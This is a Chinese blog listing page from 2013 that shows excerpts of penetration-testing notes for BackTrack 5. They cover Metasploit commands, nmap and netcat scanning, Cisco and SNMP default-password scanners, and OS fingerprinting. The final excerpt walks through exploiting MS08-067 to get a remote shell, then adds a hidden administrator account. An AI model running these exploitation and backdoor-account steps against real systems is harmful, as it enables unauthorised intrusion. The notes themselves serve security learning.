如何成为一名黑客
摘要:从小到大听说了无数关于“电脑黑客”的故事,比如XXX入侵美国五角大楼,再比如前几年的“熊猫烧香”病毒,这些故事的主角都被我们的媒体称之为 “黑客”。其实这些人,更大程度上应该被称之为“cracker(骇客)”,而不是 “hacker(黑客)”,很多媒体和作家实在是侮辱了hacker 。cracker
阅读全文
posted @
2013-11-30 23:52
寻步
阅读(660)
推荐(0)
msf常用命令
摘要:msf > search -r great -t exploits search命令查找rank为great的exploitmsf > setg RHOST 192.168.1.102 一个值赋给全局变量,这样在使用其他模块时,RHOST也同时被设定。uset usetg 解除变量msf >info exploit/windows/smb/ms08_067_netapi 查看漏洞利用详细信息
阅读全文
posted @
2013-11-29 23:27
寻步
阅读(401)
推荐(0)
解决BT5不能使用putty连接问题
摘要:root@bt:~# cd /etc/sshroot@bt:/etc/ssh# sshd-generate Generating public/private rsa1 key pair.Your identification has been saved in /etc/ssh/ssh_host_key.Your public key has been saved in /etc/ssh/ssh_host_key.pub.The key fingerprint is:fb:10:bb:82:1d:4e:5d:63:50:49:01:f5:70:f1:ad:80 root@btThe key&
阅读全文
posted @
2013-11-29 23:13
寻步
阅读(262)
推荐(0)
netcat
摘要:root@bt:~# nc -v -n -z 192.168.1.102 1-1024 端口扫描
阅读全文
posted @
2013-11-29 00:44
寻步
阅读(195)
推荐(0)
漏洞发现
摘要:cisco工具:root@bt:/pentest/cisco/cisco-auditing-tool# ./CAT -h 192.168.1.102 -w lists/community -a lists/passwords -iroot@bt:/pentest/cisco/ciscos# ./ciscos 192.168.1.0 3 -t 4 -C 10 cisco password scanner 用于扫描网段中cisco默认的密码,速度很快。snmp工具:root@bt:/pentest/enumeration/snmp/admsnmp# ./ADMsnmp 192.168.1.102.
阅读全文
posted @
2013-11-27 21:23
寻步
阅读(374)
推荐(0)
vpn探测
摘要:root@bt:~# ike-scan -M -v 192.168.1.102root@bt:~# sslscan 192.168.1.102
阅读全文
posted @
2013-11-27 20:46
寻步
阅读(79)
推荐(0)
服务探测
摘要:root@bt:~# amap -bq 192.168.1.102 80 探测目标主机目标端口的具体服务root@bt:/pentest/scanners/httsquash# ./httsquash -r 192.168.1.102 查看目标主机信息httprint
阅读全文
posted @
2013-11-27 02:33
寻步
阅读(305)
推荐(0)
端口扫描
摘要:autoscan 图形化界面netifear 图形化界面查看网段主机、服务等root@bt:~# nmap -v -v -sP 192.168.1.1/24 查看活动主机root@bt:~# nmap -v -n -A 192.168.1.102 查看目标主机开启的服务
阅读全文
posted @
2013-11-27 02:06
寻步
阅读(143)
推荐(0)
BackTrack 5 R3 Metasploit更新方法及msfupdae,msconsole出错解决办法
摘要:更新Metasploit最新版本:#cd /opt/metasploit/ #rm -rf msf3 #git clone --depth=1 git://github.com/rapid7/metasploit-framework msf3 执行msfupdate出错如下: Gem::Installer::ExtensionBuildError:ERROR:Failedtobuildgemnativeextension. /opt/metasploit/ruby/bin/rubyextconf.rb checkingforpg_config...yes Usingconfigvaluesfr
阅读全文
posted @
2013-11-27 01:15
寻步
阅读(1295)
推荐(0)
操作系统指纹
摘要:root@bt:/pentest/enumeration/irpas# p0f 被动地接受包,可以探测连接自己的主机的操作系统版本。cisco的ips的操作系统学习用的就是这个。root@bt:~# xprobe2 192.168.1.102 主动探测目标系统
阅读全文
posted @
2013-11-27 01:13
寻步
阅读(289)
推荐(0)
扫描工具
摘要:genlist -s 192.168.1.\* 只显示目标网络的活动主机hping3 -c 2 192.168.1.102 hping3工具可以自定义包发送,格式比较复杂。我们这里是最简单的应用。nbtscan 192.168.1.1-254 只能扫描出活动着的微软主机,速度很快。nping -c 1 --tcp -p 80 --flags syn 192.168.1.102 支持比较好的自定义包root@bt:/pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt 192.168.1.102 snmp服务密码...
阅读全文
posted @
2013-11-26 23:11
寻步
阅读(408)
推荐(0)
ms08_067利用过程
摘要:进入msf。show exploits。use exploit/windows/smb/ms08_067_netapi。show playloads。set PLAYLOAD windows/shell/bind_tcpset RHOST ip地址等选项。set target 41。exploit。得到cmd命令行:添加用户、提权:net user newuser 123456 /addnet localgroup administrators newuser /add
阅读全文
posted @
2013-11-25 21:45
寻步
阅读(342)
推荐(0)